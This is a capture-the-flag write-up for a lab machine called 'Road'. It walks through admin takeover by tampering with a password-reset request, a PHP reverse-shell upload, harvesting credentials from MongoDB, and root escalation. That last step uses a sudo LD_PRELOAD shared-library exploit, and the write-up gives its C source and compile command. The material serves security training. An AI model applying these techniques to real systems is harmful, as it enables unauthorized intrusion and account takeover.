Road

Vertical PrivEsc to admin - PHP File upload - Lateral Move via MongoDB - LD_PRELOAD PrivEsc to Root

• Let's start by performing some active reconnaissance by running Nmap to scan for open ports

• Enumerating the web application gives us options to either Log In or Sign In, since we dont have valid creds we can sign in as a test user and proceed to the dashboard interface

• Once logged in as the user, we find that a user has a profile page and can upload a profile image :)

However, only the admin has the access to that feature. That being said, we retrieve the admin email as admin@sky.thm which is written in cleartext on the page

• So how do we escalate our privileges as an admin, there are no JWT cookies :(

• Observe the reset user page, The Username field is greyed out and only the password fields are editable - Let's quickly intercept that request and change the test user to admin user with the same password and get admin access :)

• Now we sign in as admin@sky.thm and we can successfully upload a profile image.

• Inspecting the source code of the profile page. We find a Url pathname has been commented out and it seems to be a reasonable location of where the uploaded profile images are stored

/v2/profileimages/

• So now to trigger the reverse-shell, we can simply visit the

http://10.10.113.161/v2/profileimages/php-reverse-shell.php

Lateral Movement (www => webdeveloper)

• We find out there are MongoDB and MySQL users in the /etc/passwd file

• Which indicates that MongoDB might be running

we can get to know what all users are there on the system by running - getent passwd command

• We conclude that MongoDB is indeed running. And we can now spin up MongoDB by running mongo on the terminal

• Enter show dbs to list the available databases. The backup database looks the most interesting

• Enter use backup to access the backup database.

• Enter show collections;to list the tables on the database. We find a table user which could be interesting

• Enter db.user.find(); to read the contents of the table. Bam! we obtain passwords for the user webdeveloper

Privilege Escalation

• Enumerating this user, we use thesudo -l command to list all commands the webdeveloper user can run using sudo

• LD_PRELOAD is a function that allows any program to use shared libraries(.so)

• It pre_loads the .so files to the actual binary before even the program is executed during the run-time

• In Order to exploit this vulnerability, we'll have to write a C program and compile it as a shared library

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() 
{
 unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 system("/bin/bash");
}

• We can save this code as shell.c and compile it using gcc into a shared object file using the following parameters and transfer it our victim machine

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

• Now let's shoot our vulnerable binary as

$ sudo LD_PRELOAD=/home/webdeveloper/shell.so sky_backup_utility
root@sky:/home/webdeveloper# whoami
root